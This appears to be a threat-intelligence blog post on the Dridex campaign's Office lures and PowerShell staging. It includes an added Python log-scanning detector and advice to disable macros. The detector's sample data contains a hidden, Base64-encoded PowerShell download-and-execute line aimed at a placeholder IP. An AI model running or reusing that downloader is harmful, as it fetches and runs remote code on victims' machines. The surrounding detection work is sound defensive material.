# Dridex - A closer look at the numbers

I've been monitoring this campaign for a while, and of course there are enough educational posts available on it.

None of these blogs offer much in the way of intelligence around what the malware does; they are very technical and for that reason serve a higher purpose.

I respond better to visual information than to a wall of text. Over a period of six weeks I saw a number of complex campaigns. Dridex is evolving: it now uses PowerShell in stages, having previously used batch scripting to execute its payload.

It arrives as Word documents or Excel workbooks and, this week, even as simple XML files. The lures are not encrypted as such, but obfuscated with various methods.
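As an added example (not code from the original post), here is a small Python detector for the chain described above: an Office process spawning cmd.exe (the batch stage) or powershell.exe, decoding of a Base64 `-EncodedCommand` script so the next stage can be read, and a proxy hit on the /cashflow path that the video further down this page shows. The log formats, hostnames, IP addresses, timestamps and the stage-two one-liner are all constructed for the example; real telemetry (for example Sysmon event 1 or proxy logs) uses different field layouts and needs a matching parser.

```python
import base64
import binascii
import re
from urllib.parse import urlsplit

# Constructed log formats (not from the original post), pipe-separated:
#   process line: time|parent_image|image|command_line
#   proxy line:   time|client|method|url|status
OFFICE_IMAGES = {"winword.exe", "excel.exe"}   # the Word and Excel lures in the post
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe"}   # batch stage, then PowerShell stage
CHECKIN_PATH = "/cashflow"                     # URL path the post's video shows


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return re.split(r"[\\/]", path)[-1].lower()


def parse_process_line(line: str) -> dict:
    time, parent, image, cmdline = line.rstrip("\n").split("|", 3)
    return {"time": time, "parent": basename(parent),
            "image": basename(image), "cmdline": cmdline}


def office_spawned_script_host(event: dict) -> bool:
    """True when Word/Excel is the direct parent of cmd.exe or powershell.exe."""
    return event["parent"] in OFFICE_IMAGES and event["image"] in SCRIPT_HOSTS


def decode_encoded_command(cmdline: str):
    """Recover the script behind PowerShell's -EncodedCommand, which is
    Base64 over the UTF-16LE bytes of the script. Returns None if absent or malformed."""
    m = re.search(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", cmdline, re.IGNORECASE)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def parse_proxy_line(line: str) -> dict:
    time, client, method, url, status = line.rstrip("\n").split("|", 4)
    return {"time": time, "client": client, "method": method, "url": url, "status": status}


def hits_checkin_path(event: dict) -> bool:
    return urlsplit(event["url"]).path.rstrip("/") == CHECKIN_PATH


def scan(process_lines, proxy_lines) -> list:
    """Return one alert string per suspicious process or proxy event."""
    alerts = []
    for line in process_lines:
        ev = parse_process_line(line)
        if office_spawned_script_host(ev):
            alert = f"{ev['time']} {ev['parent']} -> {ev['image']}"
            decoded = decode_encoded_command(ev["cmdline"])
            if decoded:
                alert += f" (decoded: {decoded})"
            alerts.append(alert)
    for line in proxy_lines:
        ev = parse_proxy_line(line)
        if hits_checkin_path(ev):
            alerts.append(f"{ev['time']} {ev['client']} {ev['method']} {ev['url']}")
    return alerts


# Constructed sample data: a hypothetical stage-two downloader, encoded the way
# PowerShell expects, plus four process events and two proxy requests.
STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/cashflow')"
ENCODED = base64.b64encode(STAGE2.encode("utf-16le")).decode()
OFFICE = "C:\\Program Files\\Microsoft Office\\Office15\\"
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
PROCESS_LOG = [
    f"2015-03-02T09:14:03|{OFFICE}WINWORD.EXE|{PS}|powershell -w hidden -enc {ENCODED}",
    f"2015-03-02T09:15:41|{OFFICE}EXCEL.EXE|C:\\Windows\\System32\\cmd.exe|cmd /c stage.bat",
    f"2015-03-02T09:13:50|C:\\Windows\\explorer.exe|{OFFICE}WINWORD.EXE|WINWORD.EXE /n",  # benign
    f"2015-03-02T09:30:12|C:\\Windows\\explorer.exe|{PS}|powershell",                     # benign
]
PROXY_LOG = [
    "2015-03-02T09:14:09|10.0.0.12|POST|http://203.0.113.7/cashflow|200",
    "2015-03-02T09:14:10|10.0.0.12|GET|http://www.example.com/|200",
]

if __name__ == "__main__":
    for a in scan(PROCESS_LOG, PROXY_LOG):
        print(a)
```

Parent-child matching on file names alone is deliberately coarse; in production you would key on full image paths and signer information, and extend the chain check to grandparents so a Word to cmd.exe to powershell.exe sequence is also caught.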

Mitigation is straightforward: disable macros by policy. Educate your users. They are the biggest threat, and also the biggest allies: they are the ones who can educate you on the final stage, which in some respects is your blind spot. When a new attack vector is launched, the user is the beta tester both for your company and for the threat actor.

Build some good QA into them, if nothing else.


Dridex infographic

A short video of information being sent to a server with the /cashflow URL.